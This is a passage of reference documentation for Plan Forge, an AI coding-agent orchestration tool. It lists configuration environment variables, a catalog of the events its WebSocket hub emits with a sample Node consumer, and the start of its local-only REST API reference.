Tune these only when the defaults are too tight, usually on slow CI runners or when a long-running gate (large vitest suite, integration test, browser test) exceeds its timeout.
| Variable | Type | Default | Scope | Set when | Security |
|---|---|---|---|---|---|
PFORGE_GATE_TIMEOUT_MS | number (ms) | (see orchestrator.mjs) | per-session | A gate's test suite takes longer than the default to run. | Not secret. |
PFORGE_WORKER_TIMEOUT_MS | number (ms) | (see orchestrator.mjs) | per-session | A worker (slice executor) needs more wall-clock than the default. | Not secret. |
PFORGE_WORKER_OUTPUT_IDLE_MS | number (ms) | (see orchestrator.mjs) | per-session | A worker is legitimately silent for long stretches (large builds) but should not be killed. | Not secret. |
PFORGE_BASH_PATH | string (path) | (auto-detected) | per-machine | Windows host with bash in a non-standard location. Plan Forge cannot find bash.exe on PATH and the auto-detection fails. | Not secret. |
Opt-in switches for experimental subsystems and bypasses for hardening rails. Most users never touch these.
| Variable | Type | Default | Scope | Set when | Security |
|---|---|---|---|---|---|
PFORGE_DISABLE_TEMPERING | boolean (1/0) | (unset) | per-session | You need to bypass Tempering scans for one run (e.g. running an audit-loop slice that would scan its own scaffolding). | Not secret. Use sparingly: this disables quality scans. |
PFORGE_FOUNDRY_QUOTA_PREFLIGHT | boolean (1/0) | (unset) | per-machine | You want the orchestrator to check Foundry quota before dispatching slices to an Azure OpenAI deployment. | Not secret. |
PFORGE_GATE_LINT_STRICT | boolean (1/0) | 0 | per-session | You want gate-lint findings to be hard failures rather than warnings. | Not secret. |
PFORGE_DRAIN_ON_INIT | boolean (true/false) | true | per-machine | You do not want the MCP server to drain the Tempering queue on startup (CI runners that start and stop the server many times). | Not secret. |
PFORGE_ALLOW_MASTER_COMMIT | boolean (1/0) | (unset) | per-session | You explicitly want to allow a commit on master while a run-plan is active (PreCommit hook normally blocks this). | Not secret. Discouraged: the guard exists for a reason. |
PFORGE_NETWORK_LOG_ONLY | boolean (1/0) | 1 | per-session | network.allowed is set and you want the in-process proxy to stay in log-only mode. When 1, the proxy records contacted hostnames but does not block connections. | Not secret. Default-on while allowlist enforcement remains advisory. |
PFORGE_COST_MODEL | string | (auto-detected) | per-session | You want to pin slice pricing to a specific model (subscription mode, e.g. flat Copilot pricing, or a non-default vendor). | Not secret. |
Standard OTel variables. When OTEL_EXPORTER_OTLP_ENDPOINT is set, the MCP server auto-enables tracing and ships spans to the configured collector. See Compliance & Data Residency — Observability Export for the full collector setup.
| Variable | Type | Default | Scope | Set when | Security |
|---|---|---|---|---|---|
OTEL_ENABLED | boolean (true/1) | (unset) | per-machine | You want to force-enable OTel even without an endpoint (useful for local console exporter). | Not secret. |
OTEL_EXPORTER_OTLP_ENDPOINT | string (URL) | (unset) | per-machine | You want spans shipped to an OTLP collector. Setting this implicitly turns OTel on. | Not secret if the collector is internal; treat as secret if the URL embeds a token. |
OTEL_SERVICE_NAME | string | "plan-forge-mcp" | per-machine | You run multiple Plan Forge instances and need distinct service names in your APM. | Not secret. |
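The enablement rule in the table above can be sketched as a pair of pure functions. This is an illustration under stated assumptions, not the MCP server's actual code: the function names `isTracingEnabled` and `serviceName` are hypothetical, and the sketch treats only the literal strings `true` and `1` as a force-enable, following the Type column.

```javascript
// Hypothetical helpers that mirror the OTel rows above; not Plan Forge source.

// Tracing is on when OTEL_ENABLED is "true" or "1", or when an OTLP endpoint is set.
function isTracingEnabled(env) {
  const forced = env.OTEL_ENABLED === "true" || env.OTEL_ENABLED === "1";
  const endpoint = (env.OTEL_EXPORTER_OTLP_ENDPOINT ?? "").trim();
  return forced || endpoint !== "";
}

// Falls back to the documented default service name when the variable is unset or empty.
function serviceName(env) {
  return env.OTEL_SERVICE_NAME || "plan-forge-mcp";
}

console.log(isTracingEnabled({ OTEL_EXPORTER_OTLP_ENDPOINT: "http://127.0.0.1:4318" })); // true
console.log(isTracingEnabled({})); // false
console.log(serviceName({})); // plan-forge-mcp
```

Passing the environment in as a plain object, rather than reading `process.env` directly, keeps the rule easy to exercise in tests.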
Plan Forge reads these to figure out which IDE or agent CLI is hosting it, so the orchestrator can pick the right routing default and the right model surface. You should never set these yourself; they are populated automatically by the host. Listed here for transparency only.
| Variable | Type | Default | Source | What it tells Plan Forge | Security |
|---|---|---|---|---|---|
NODE_ENV | enum | (unset) | Node.js convention | test short-circuits hub init and notification side effects; production tightens logging. | Not secret. |
VSCODE_PID | number (PID) | (set by VS Code) | VS Code | Plan Forge is running inside VS Code. | Not secret. |
VSCODE_AGENT_MODE | string | (set by VS Code) | VS Code Agent Mode | enterprise means VS Code Agents Enterprise; Plan Forge picks a different default model route. | Not secret. |
TERM_PROGRAM | string | (set by terminal) | Terminal | vscode or cursor triggers host-specific routing. | Not secret. |
CLAUDECODE | string | (set by Claude Code) | Claude Code CLI | 1 means Plan Forge is running under Claude Code. | Not secret. |
CLAUDE_CODE_ENTRYPOINT | string | (set by Claude Code) | Claude Code CLI | Alternate signal for Claude Code detection. | Not secret. |
CURSOR_TRACE_ID | string | (set by Cursor) | Cursor | Plan Forge is running under Cursor; cross-checked with TERM_PROGRAM=cursor. | Not secret. |
ZED_TERM | string | (set by Zed) | Zed editor | Plan Forge is running under Zed. | Not secret. |
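To make the table concrete, here is a rough sketch of how the signals above could be combined into a single host label. Everything beyond the variable names is an assumption: the function name `detectHost`, the returned labels, and the order of the checks are illustrative and are not taken from Plan Forge's detection code.

```javascript
// Hypothetical host classifier built only from the variables listed above.
// The check order and the returned labels are assumptions made for illustration.
function detectHost(env) {
  if (env.CLAUDECODE === "1" || env.CLAUDE_CODE_ENTRYPOINT) return "claude-code";
  // Cursor is checked before VS Code on the assumption that a VS Code fork
  // may also populate VS Code's own variables.
  if (env.CURSOR_TRACE_ID || env.TERM_PROGRAM === "cursor") return "cursor";
  if (env.ZED_TERM) return "zed";
  if (env.VSCODE_PID || env.TERM_PROGRAM === "vscode") {
    return env.VSCODE_AGENT_MODE === "enterprise" ? "vscode-enterprise" : "vscode";
  }
  return "unknown";
}

console.log(detectHost({ VSCODE_PID: "4242", VSCODE_AGENT_MODE: "enterprise" })); // vscode-enterprise
console.log(detectHost({ TERM_PROGRAM: "cursor", VSCODE_PID: "4242" })); // cursor
console.log(detectHost({})); // unknown
```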
These variables are set by the CLI or the orchestrator for the duration of one invocation and then unset. Do not set them in your shell profile; they are documented for transparency and for users writing extensions.
| Variable | Type | Set by | Read by | Purpose | Security |
|---|---|---|---|---|---|
PFORGE_CHILD_MODE | boolean (1/0) | MCP server when it spawns a child Node process | server.mjs | Suppresses double-binding of HTTP/WS ports in the child. | Not secret. |
PFORGE_RUN_PLAN_ACTIVE | boolean (1/0) | pforge run-plan | PreCommit hook | Tells the master-branch commit guard that the commit is part of an authorised run. | Not secret. |
PFORGE_QUORUM_TURN | boolean (1/0) | Orchestrator during quorum dispatch | PreAgentHandoff hook | Skips LiveGuard context injection during quorum fan-out (one of the documented v3.5+ PreAgentHandoff bypasses). | Not secret. |
ORG_RULES_FORMAT · ORG_RULES_OUTPUT | string | pforge org-rules | orchestrator | Tells forge_org_rules what format and output path to use. | Not secret. |
FORGE_SMOKE | boolean (1/0) | CI smoke-test job | vitest skipIf gate | Enables long-running smoke tests (default off in CI). | Not secret. |
When a setting has multiple sources, the orchestrator resolves them in this order; the first source that yields a non-empty value wins:
--quorum=power).
Model: claude-opus-4.7).
.forge/secrets.json for the keys listed in the Provider API Keys table.
.forge.json for the keys listed in Appendix T.
orchestrator.mjs or capabilities.mjs.
One concrete example. OPENAI_API_KEY is resolved by checking process.env first, then falling back to .forge/secrets.json#OPENAI_API_KEY. The dashboard's Config → Secrets tab writes the latter; CI runners typically rely on the former. Both work; the env-var wins when both are set.
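The OPENAI_API_KEY example can be sketched as a small pure function. This is a minimal illustration and not the loader in pforge-mcp/secrets.mjs: the name `resolveSecret` is hypothetical, and the sketch takes the already-parsed contents of .forge/secrets.json as a plain object so that it stays self-contained.

```javascript
// Hypothetical helper: resolve a provider key from the environment first,
// then from the parsed contents of .forge/secrets.json.
function resolveSecret(name, env, secrets) {
  const candidates = [
    { source: "env", value: env[name] },
    { source: "secrets-file", value: secrets[name] },
  ];
  // The first source that yields a non-empty string wins.
  for (const candidate of candidates) {
    if (typeof candidate.value === "string" && candidate.value.trim() !== "") {
      return candidate;
    }
  }
  return { source: "none", value: undefined };
}

const env = { OPENAI_API_KEY: "sk-from-env" };
const secrets = { OPENAI_API_KEY: "sk-from-file", XAI_API_KEY: "xai-from-file" };

console.log(resolveSecret("OPENAI_API_KEY", env, secrets).source); // env
console.log(resolveSecret("XAI_API_KEY", env, secrets).source); // secrets-file
console.log(resolveSecret("ANTHROPIC_API_KEY", env, secrets).source); // none
```

Returning the winning source alongside the value makes it easy to log where a key came from without ever logging the key itself.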
A representative shell setup for a developer on Windows running a hybrid Azure-OpenAI / Anthropic stack with the dashboard on a non-default port:
# Provider keys (better: store in .forge/secrets.json)
$env:ANTHROPIC_API_KEY = "sk-ant-..."
$env:OPENAI_API_KEY = "sk-..."
# Azure OpenAI alternative routing
$env:AZURE_OPENAI_ENDPOINT = "https://contoso-aoai.openai.azure.com/"
$env:AZURE_OPENAI_API_VERSION = "2024-02-01"
$env:AZURE_OPENAI_DEPLOYMENT_TYPE = "global"
$env:AZURE_AUTH_MODE = "managed-identity"
# Non-default ports (3100/3101 conflicted with another local service)
$env:PLAN_FORGE_HTTP_PORT = "3110"
$env:PLAN_FORGE_WS_PORT = "3111"
$env:PFORGE_DASHBOARD_PORT = "3110"
# Tracing to a local OTel collector
$env:OTEL_EXPORTER_OTLP_ENDPOINT = "http://127.0.0.1:4318"
$env:OTEL_SERVICE_NAME = "plan-forge-mcp-dev"
# Lift gate timeout for a long-running integration suite
$env:PFORGE_GATE_TIMEOUT_MS = "600000" # 10 minutes
.forge.json Reference, the per-project config file that pairs with this appendix.
.forge.json, env vars, and instruction files interact when settings conflict.
PFORGE_AUTH_TOKEN gates.
.forge/secrets.json and the canonical source for the provider-key whitelist.
ERR_NO_API_KEY, ERR_TESTBED_NOT_FOUND, and the gate-timeout family.
Every event Plan Forge emits over the WebSocket hub and the run journal, grouped by family, with emitter, trigger, the key payload fields, consumers, and retention. This appendix is the ebook companion to the canonical schema at pforge-mcp/EVENTS.md: the source-of-truth JSON examples live in the schema file; this page provides the orientation, classification, and lifecycle guidance that schema files rarely carry.
ws://127.0.0.1:3101. Three different consumers read the same stream: the dashboard (live UI), the run journal (.forge/runs/*.jsonl for replay), and external bridges (Telegram, Slack, OpenClaw). Adding a new consumer is a matter of opening a socket and filtering by type; the schema below tells you exactly what fields each consumer can rely on.
Plan Forge emits 38 distinct event types across eight families. The two most-watched families are lifecycle (run/slice progression) and LiveGuard (drift, incidents, secret scans). The remaining six families round out the picture: skills, Crucible, bridge approvals, escalation/CI, the lone client→server message, and the Tempering validation event.
| Family | Count | What it tells you |
|---|---|---|
| Lifecycle | 7 | Run and slice progression, the primary signal the dashboard renders on the Progress tab. |
| Skills | 4 | Per-step skill execution; drives the same Progress UI, but for forge_run_skill rather than forge_run_plan. |
| Crucible | 3 | Idea→spec smelt progression; powers the Forge-Master and Crucible dashboard tabs. |
| Bridge | 4 | External-channel approvals and notification dispatch status (Telegram, Slack, Discord, webhooks). |
| Escalation & CI | 2 | Quorum escalation and GitHub Actions dispatch. |
| Client→server | 1 | The single inbound message type clients can send (set-label). |
| LiveGuard | 10 | Drift, incidents, secret scans, watch snapshots, fix proposals: the production-ops feedback loop. |
| Tempering | 1 | The bug-fix validation event, emitted only on the green leg of the bug lifecycle. |
Every emitted event shares a five-field envelope (documented below). Two enums, source and security_risk, are referenced throughout. Subscription mechanics are at Consuming the stream, and retention rules for events that escape the WebSocket (logged to .forge/runs/, posted to OpenClaw, etc.) are at Retention.
Every event (lifecycle, skill, LiveGuard, all of them) carries the same five-field envelope. Consumers can rely on these fields being present even on event types this catalog does not list (forward-compatible by design).
| Field | Type | Example | Purpose |
|---|---|---|---|
version | string | "1.0" | Schema version. Always "1.0" today; reserved for future breaking changes. |
type | string | "slice-completed" | The event-type identifier, the column heading you filter on. Stable across releases. |
timestamp | string (ISO-8601 UTC) | "2026-05-18T09:30:00.000Z" | Emission time. Always UTC; never local time. |
source | enum (9 values) | "orchestrator" | Which subsystem emitted the event (see below). |
security_risk | enum (5 values) | "none" | Risk classification at emission time (see below). Defaults to "none". |
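A consumer that wants to verify the envelope before trusting an event could use a check along these lines. It is a sketch only: the helper name `missingEnvelopeFields` is hypothetical, and it checks just that each of the five fields is present as a string, not that enum values are recognised.

```javascript
// The five envelope fields from the table above.
const ENVELOPE_FIELDS = ["version", "type", "timestamp", "source", "security_risk"];

// Hypothetical helper: returns the names of envelope fields that are absent
// or not strings. An empty array means the envelope is complete.
function missingEnvelopeFields(evt) {
  return ENVELOPE_FIELDS.filter((field) => typeof evt?.[field] !== "string");
}

const sample = {
  version: "1.0",
  type: "slice-completed",
  timestamp: "2026-05-18T09:30:00.000Z",
  source: "orchestrator",
  security_risk: "none",
  sliceId: "3", // payload fields are ignored by the envelope check
};

console.log(missingEnvelopeFields(sample).length); // 0
console.log(missingEnvelopeFields({ type: "slice-started" }).length); // 4
```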
source enum
The nine subsystems that emit events. New subsystems are added rarely; existing values are never repurposed.
| Value | Subsystem |
|---|---|
orchestrator | Plan execution engine in orchestrator.mjs; emits the lifecycle family. |
worker | Per-slice child process. Rare; most worker telemetry is wrapped by the orchestrator. |
hub | The WebSocket hub itself; emits connected on new sessions. |
bridge | External notification bridge; emits bridge-notification-*. |
liveguard | The LiveGuard subsystem; emits the entire LiveGuard family. |
crucible | The idea→spec funnel; emits crucible-smelt-*. |
skill | Skill runner; emits the skill family. |
watcher | Cross-project watcher; emits watch-*. |
audit | Audit-classifier loop. Rare; emits reclassification events when run. |
security_risk enum
The risk classification attached to every event at emission time. Subscribers (and OpenClaw) can filter by this field to focus on high-risk activity.
| Value | Meaning | Typical event types |
|---|---|---|
none | Routine lifecycle activity with no security implication. | slice-started, slice-completed, skill-* |
low | Activity that touches managed secrets or external networks but is expected. | bridge-notification-sent, ci-triggered |
medium | Quorum dispatch, agent handoff, escalation: outside the routine path but authorised. | slice-escalated, approval-requested |
high | Drift or incident events that warrant a human glance. | liveguard-incident, liveguard-secret-scan (when findings present) |
critical | Reserved for active-incident escalations; emitted by the audit subsystem only. | (none in default catalog) |
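Filtering by risk needs an ordering over the five values. The sketch below assumes the order in which the table lists them (none, low, medium, high, critical) is also the severity order; the helper name `riskAtLeast` is hypothetical.

```javascript
// Assumed severity order, taken from the row order of the table above.
const RISK_ORDER = ["none", "low", "medium", "high", "critical"];

// Hypothetical helper: true when the event's risk is at or above the floor.
// A missing security_risk is treated as "none" (the documented default).
// An unrecognised value ranks below "none", so it never matches any floor.
function riskAtLeast(evt, floor) {
  const wanted = RISK_ORDER.indexOf(floor);
  if (wanted === -1) throw new RangeError(`unknown risk level: ${floor}`);
  const actual = RISK_ORDER.indexOf(evt.security_risk ?? "none");
  return actual >= wanted;
}

console.log(riskAtLeast({ type: "liveguard-incident", security_risk: "high" }, "medium")); // true
console.log(riskAtLeast({ type: "ci-triggered", security_risk: "low" }, "medium")); // false
```

A paging consumer that would rather err on the side of noise could instead treat unrecognised values as matching; the choice here is only one option.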
source: "orchestrator" (one exception: connected is emitted by the hub). The Progress tab on the dashboard is driven entirely by this family; the run journal at .forge/runs/<run-id>.jsonl persists every one of them for replay.
| Event | Emitter | Trigger | Key payload |
|---|---|---|---|
connected | hub | A client opens a WebSocket connection to ws://127.0.0.1:3101. | clientId, label, historySize (how many past events are about to be replayed). |
run-started | orchestrator | runPlan() begins. | plan, mode, model, sliceCount, executionOrder. |
slice-started | orchestrator | A slice begins execution (after its gate passes). | sliceId, title. |
slice-completed | orchestrator | A slice passes all validation gates. | sliceId, status: "passed", duration (ms), tokens (in/out + model), cost_usd. |
slice-failed | orchestrator | A slice or its validation gate fails after the retry budget is exhausted. | sliceId, status: "failed", error, failedCommand. |
run-completed | orchestrator | All slices finish (mixed pass/fail allowed). | status, results (passed/failed counts), totalDuration, cost, sweep, analyze, report. |
run-aborted | orchestrator | Execution aborted via forge_abort. | sliceId (the slice that was running), reason. |
Full JSON examples: EVENTS.md — Event Types.
source: "skill". Emitted by skill-runner.mjs on every forge_run_skill invocation. The structure mirrors lifecycle events deliberately: dashboard code reuses the same renderer for both families.
| Event | Trigger | Key payload |
|---|---|---|
skill-started | Skill begins execution. | skillName, stepCount, args. |
skill-step-started | A skill step begins. | skillName, stepNumber, stepName. |
skill-step-completed | A skill step finishes (pass or fail). | stepNumber, stepName, status, duration. |
skill-completed | All skill steps finish. | skillName, status, stepsPassed, stepsFailed, totalDuration. |
source: "crucible". Emitted as smelts progress through the idea→hardened-spec funnel. The payload is wrapped in a data object, matching the LiveGuard convention rather than the flat-payload lifecycle convention; consumers should branch on family rather than assume one shape.
| Event | Trigger | Key payload (under data) |
|---|---|---|
crucible-smelt-started | forge_crucible_submit creates a new smelt. | id, lane, source. |
crucible-smelt-updated | forge_crucible_ask records an answer and advances the interview. | id, questionIndex, totalQuestions. |
crucible-smelt-finalized | forge_crucible_finalize claims a phase number and writes docs/plans/Phase-NN.md. | id, phaseName, planPath. |
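One way a consumer might normalise the two payload shapes is sketched below. The helper name `payloadOf` is hypothetical, and the list of type prefixes treated as wrapped is an assumption read off this catalog's table headings ("Key payload (under data)"); check it against EVENTS.md before relying on it.

```javascript
// Assumption: these type prefixes mark the families whose payload sits under `data`.
const WRAPPED_PREFIXES = ["crucible-", "liveguard-", "watch-", "fix-proposal-", "tempering-"];
const ENVELOPE_KEYS = new Set(["version", "type", "timestamp", "source", "security_risk"]);

// Hypothetical helper: return just the payload fields, whichever shape the family uses.
function payloadOf(evt) {
  const type = String(evt.type ?? "");
  const wrapped = WRAPPED_PREFIXES.some((prefix) => type.startsWith(prefix));
  if (wrapped) return evt.data ?? {};
  // Flat families: everything that is not an envelope field is payload.
  return Object.fromEntries(
    Object.entries(evt).filter(([key]) => !ENVELOPE_KEYS.has(key))
  );
}

const flat = { version: "1.0", type: "slice-started", source: "orchestrator", sliceId: "2", title: "Add API" };
const nested = { version: "1.0", type: "crucible-smelt-started", source: "crucible", data: { id: "s1", lane: "feature" } };

console.log(payloadOf(flat).sliceId); // 2
console.log(payloadOf(nested).id); // s1
```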
source: "bridge". Emitted by the notification bridge when it pauses for external approval or dispatches a webhook. Configure the bridge via the extensions/ notify-* extensions and PFORGE_BRIDGE_SECRET (see Appendix U — Server Ports).
| Event | Trigger | Key payload |
|---|---|---|
approval-requested | The bridge pauses execution and requests external approval. | runId, plan, channels, timeoutMinutes. |
approval-received | An external approval callback is received. | runId, action (approve / deny), approver. |
bridge-notification-sent | A webhook notification is successfully dispatched to a channel. | channel, platform, eventType, status: "sent". |
bridge-notification-failed | A webhook dispatch fails (network error, bad status, etc.). | channel, error. |
source: "orchestrator". Two events that mark deliberate routing decisions: quorum escalation when a slice's complexity score exceeds the threshold, and CI dispatch when a plan run triggers a GitHub Actions workflow.
| Event | Trigger | Key payload |
|---|---|---|
slice-escalated | A slice is escalated to quorum for multi-model consensus review. | sliceId, reason, models (array of model IDs). |
ci-triggered | A CI workflow is dispatched from a plan run. | workflow, ref, inputs. |
The only inbound message type the hub honours. Send it once after opening the WebSocket to identify your client in the session registry (visible in the dashboard's Connections badge).
| Message | Purpose | Payload |
|---|---|---|
set-label | Update the client's label in the session registry. | { "type": "set-label", "label": "my-dashboard" } |
source: "liveguard". The production-ops feedback family, emitted by forge_drift_report, forge_incident_capture, forge_alert_triage, forge_secret_scan, forge_fix_proposal, and the watcher tools. Most carry security_risk: "low" or higher; filter on security_risk >= medium to drive paging.
| Event | Trigger | Key payload (under data) | Default risk |
|---|---|---|---|
liveguard-drift | Drift score changes. | score, delta, violations, timestamp. | low (escalates with delta) |
liveguard-incident | An incident is captured or resolved. | id, severity, description, status. | high |
liveguard-triage | forge_alert_triage runs. | alertCount, topSeverity, rankedAlerts. | medium |
liveguard-secret-scan | A secret scan completes. | clean, findingsCount, scannedAt. | none if clean; high if findings. |
liveguard-tool-completed | Any LiveGuard tool finishes executing. | tool, status, durationMs. | none |
fix-proposal-ready | forge_fix_proposal generates a new fix plan. | fixId, plan (path to LIVEGUARD-FIX plan), source. | medium |
watch-snapshot-completed | forge_watch builds a snapshot of a target project. | target, runState, runId, anomalyCount, cursor, counts. | none |
watch-anomaly-detected | forge_watch detects one or more anomalies (one event per invocation, not per anomaly). | target, runId, anomalies (array of {code, severity, message}). | medium (escalates with severity) |
watch-advice-generated | forge_watch analyze-mode produces narrative advice from a frontier model. | target, runId, model, tokensIn, tokensOut, durationMs, advicePreview. | low |
Anomaly codes used in watch-anomaly-detected: stalled, tokens-zero, high-retries, slice-failed, all-skipped, gate-on-prose, model-escalated, quorum-dissent, quorum-leg-stalled, skill-step-failed.
source: "audit". One event, emitted only on the green leg of the bug lifecycle, when forge_bug_validate_fix confirms that all scanners pass on re-run. There is no matching tempering-bug-validated-broken event; the validation tool returns the result to the caller without emitting on the red leg, to keep the dashboard's Bugs Fixed tile a positive-only feed.
| Event | Trigger | Key payload (under data) |
|---|---|---|
tempering-bug-validated-fixed | forge_bug_validate_fix confirms a bug is fixed: all scanners pass on re-run. | bugId, scanner, verdict: "fixed", attempt (timestamp, scanners array, result). |
The simplest possible consumer is a Node script that subscribes to the stream and prints the events it cares about (here, high-risk events and slice lifecycle events):
import WebSocket from "ws";

const ws = new WebSocket("ws://127.0.0.1:3101");

ws.on("open", () => {
  ws.send(JSON.stringify({ type: "set-label", label: "my-consumer" }));
});

ws.on("message", (raw) => {
  const evt = JSON.parse(raw.toString());
  // Filter however you like:
  if (evt.security_risk === "high" || evt.security_risk === "critical") {
    console.error(`[HIGH] ${evt.type}`, evt);
  } else if (evt.type?.startsWith("slice-")) {
    console.log(`[LIFECYCLE] ${evt.type} sliceId=${evt.sliceId} status=${evt.status ?? ""}`);
  }
});
On connection the hub replays buffered events from the in-memory ring (default ~500 events; see hub.mjs). To enable bearer-token auth on the hub, set PFORGE_BRIDGE_SECRET; the consumer then sends Authorization: Bearer <secret> on the upgrade request.
Events live in up to four places after emission. The retention rules below tell you how long each consumer keeps them, and which fields each consumer can rely on having.
| Sink | What is kept | Retention | How to read it |
|---|---|---|---|
| WebSocket hub (in-memory ring) | All events. | ~500 events (oldest evicted). Wiped on hub restart. | Connect to ws://127.0.0.1:3101; the hub replays the ring on connected. |
| Run journal | Lifecycle, skill, escalation, CI: everything tied to a runId. | Forever (until you delete the file). One JSONL per run at .forge/runs/<run-id>.jsonl. | forge_home_snapshot, or jq over the JSONL file. |
| LiveGuard cache | The most recent liveguard-drift, liveguard-secret-scan, liveguard-incident snapshots. | One snapshot per type at .forge/liveguard-*.json, overwritten on next emission. | forge_drift_report, forge_secret_scan (returns the cached snapshot when within cacheMaxAgeMinutes). |
| OpenClaw analytics (opt-in) | Whatever the PreAgentHandoff hook posts; typically a roll-up of drift, MTTR, and open incidents. | Determined by the OpenClaw deployment; not Plan Forge's responsibility. | OpenClaw API. |
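As an alternative to jq, the run journal can be read with a few lines of Node. The sketch below assumes each line of the JSONL file is one event object carrying the lifecycle fields documented in this appendix (`type`, `cost_usd`); the function name `summarizeJournal` is hypothetical, and the input is passed in as a string so the example needs no file access.

```javascript
// Hypothetical helper: tally slice outcomes and cost from run-journal text.
// Assumes one JSON event per line, as the .jsonl extension suggests.
function summarizeJournal(jsonlText) {
  const summary = { passed: 0, failed: 0, costUsd: 0 };
  for (const line of jsonlText.split("\n")) {
    if (line.trim() === "") continue;
    let evt;
    try {
      evt = JSON.parse(line);
    } catch {
      continue; // skip a torn or partially written line
    }
    if (evt.type === "slice-completed") {
      summary.passed += 1;
      summary.costUsd += Number(evt.cost_usd) || 0;
    } else if (evt.type === "slice-failed") {
      summary.failed += 1;
    }
  }
  return summary;
}

const journal = [
  '{"type":"run-started","plan":"docs/plans/Phase-01.md"}',
  '{"type":"slice-completed","sliceId":"1","cost_usd":0.25}',
  '{"type":"slice-failed","sliceId":"2","error":"gate failed"}',
].join("\n");

console.log(summarizeJournal(journal)); // { passed: 1, failed: 1, costUsd: 0.25 }
```

In practice the text would come from reading a file under .forge/runs/ with `fs.readFileSync(path, "utf8")`.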
openclaw, configuring the optional OpenClaw analytics sink.
PFORGE_BRIDGE_SECRET, PLAN_FORGE_WS_PORT, and other env vars that gate hub access.
postSlice, preDeploy, etc.).
Every REST endpoint the Plan Forge MCP server exposes, grouped by subsystem, with verb, path, request body shape, response shape, and status codes. The companion to Appendix V — Event Catalog (which covers the WebSocket side) and Appendix Q — API Surface Index (which catalogs the MCP tool surface).
pforge-mcp/server.mjs serves three concurrent surfaces on the same process: stdio MCP for IDE agents, REST + WebSocket on port 3100 for the dashboard and any external integration, and a Forge-Master HTTP surface for the conversational entrypoint. This appendix covers the REST + Forge-Master surfaces; the MCP tool surface is documented in Appendix Q.
Plan Forge exposes ~91 REST endpoints across 16 subsystems. Every one of the 106 MCP tools can also be invoked over REST through the generic dispatcher (POST /api/tool/:name); the explicit endpoints below are the "first-class" surfaces the dashboard and CLI use, with responses shaped for direct UI consumption rather than wrapped in tool-call envelopes.
| Subsystem | Count | What it covers |
|---|---|---|
| Discovery | 4 | Liveness, version, capability manifest, well-known endpoint. |
| Plan execution & runs | 10 | List/trigger/abort plan runs, traces, replay, plans, workers. |
| Cost | 1 | Token-spend report across providers and months. |
| Search, timeline, hub | 3 | Cross-surface search, unified timeline, WebSocket upgrade. |
| Memory (L1/L2/L3) | 7 | Capture, drain, search, presets, OpenBrain stats and replay. |
| Crucible | 10 | Idea smelt lifecycle (submit, ask, preview, finalize, abandon, governance). |
| LiveGuard | 14 | Drift, incidents, deploy journal, regression guard, runbooks, hotspots, triage, secret scan, dep watch, env diff. |
| Quorum & fix proposals | 4 | Read/write quorum prompts, list/propose fix plans. |
| Tempering & bugs | 3 | Tempering artifact, bug stub from finding, bug list. |
| Skills (decision tray) | 5 | Pending decisions, accept/reject/defer, full skill catalog. |
| Inner loop | 7 | Reviewer calibration, gate suggestions, cost anomalies, proposed fixes, federation. |
| Bridge & approvals | 3 | Pending approvals, programmatic + browser-link approval. |
| Copilot integration | 5 | copilot-instructions.md read/preview/sync, OpenClaw snapshot/config. |
| GitHub & team coordination | 4 | GitHub metrics, readiness, team dashboard, team activity. |
| Notifications, audit, dashboard, settings | 13 | Notification config, audit config/drain, dashboard state, config, secrets, extensions, update, server restart. |
| Generic MCP dispatcher | 3 | The POST /api/tool/:name escape hatch that exposes any of the 106 MCP tools over REST. |
| Forge-Master | 10 | The conversational entrypoint, chat sessions, prompts, prefs, cache stats. |
| Image generation | 1 | Generate images via xAI Grok Aurora or OpenAI DALL-E. |
The trust model is local user. The server binds explicitly to 127.0.0.1 (loopback only) and runs no authentication layer of its own; the operating system's user account is the access boundary. Concretely:
app.listen(HTTP_PORT, "127.0.0.1", ...), remote hosts cannot reach the API; only processes running as the same OS user can.
3100 by default; override with PLAN_FORGE_HTTP_PORT (see Appendix U: Server Ports).
http://127.0.0.1:3100/dashboard share the same origin.
PFORGE_BRIDGE_SECRET, see Bridge & approvals.
If you need to expose the API beyond loopback (rare; usually it's the wrong solution), put a reverse proxy in front of it that handles TLS and authentication. Do not change the bind address; it's a deliberate safety boundary.
POST/PUT endpoints expect Content-Type: application/json. The server uses express.json() with the default 100 KB body limit; payloads larger than that return 413 Payload Too Large.
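A client can check a payload against that limit before sending it. The sketch below assumes the limit is Express's stock default of 100 KB, read as 102,400 bytes of UTF-8 JSON; the helper name `fitsBodyLimit` is hypothetical, and a server configured with a different limit would need a different constant.

```javascript
// Assumption: the server keeps express.json()'s default "100kb" limit (100 * 1024 bytes).
const BODY_LIMIT_BYTES = 100 * 1024;

// Hypothetical helper: true when the serialized payload is within the limit.
// Measures UTF-8 bytes, not characters, because that is what travels on the wire.
function fitsBodyLimit(payload) {
  const bytes = Buffer.byteLength(JSON.stringify(payload), "utf8");
  return bytes <= BODY_LIMIT_BYTES;
}

console.log(fitsBodyLimit({ plan: "docs/plans/Phase-01.md", dryRun: true })); // true
console.log(fitsBodyLimit({ blob: "x".repeat(200 * 1024) })); // false
```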
Endpoint handlers wrap exceptions in a consistent envelope:
// 4xx / 5xx
{
"error": "Human-readable message",
"code": "OPTIONAL_MACHINE_CODE", // e.g. ASK_QUESTION_MISMATCH, PLAN_ALREADY_EXISTS
"details": { ... } // optional structured context
}
Status codes follow standard HTTP semantics: 400 for malformed input, 404 for missing resources, 409 for state conflicts (most common in Crucible finalize), 413 for body limits, 500 for unexpected server errors. The complete error-code table lives in the Errors & Exit Codes appendix (forthcoming Appendix X).
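A thin client wrapper can turn this envelope into a typed error so that callers branch on the status and code instead of the message text. This is a minimal sketch, not the SDK's implementation: `ForgeApiError` and `requestJson` are hypothetical names, the base URL is the default used throughout this appendix, and `fetch` is the global available in Node 18 and later.

```javascript
// Error subclass carrying the envelope fields described above.
class ForgeApiError extends Error {
  constructor(status, envelope) {
    super(envelope.error ?? `HTTP ${status}`);
    this.name = "ForgeApiError";
    this.status = status;
    this.code = envelope.code ?? null; // optional machine code
    this.details = envelope.details ?? null; // optional structured context
  }
}

// Hypothetical wrapper: resolves with the parsed body, rejects with ForgeApiError.
async function requestJson(path, init = {}, baseUrl = "http://127.0.0.1:3100") {
  const res = await fetch(new URL(path, baseUrl), init);
  const text = await res.text();
  let body;
  try {
    body = text ? JSON.parse(text) : {};
  } catch {
    body = null; // not JSON, e.g. an endpoint that returns raw markdown
  }
  if (!res.ok) throw new ForgeApiError(res.status, body ?? { error: text });
  return body ?? text;
}
```

A caller could then write `catch (e) { if (e.code === "PLAN_ALREADY_EXISTS") ... }` and leave the message for logs.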
Lightweight endpoints intended for liveness checks, build identification, and capability negotiation. These are safe to poll; none of them allocates workers or writes files.
| Method | Path | Purpose | Response |
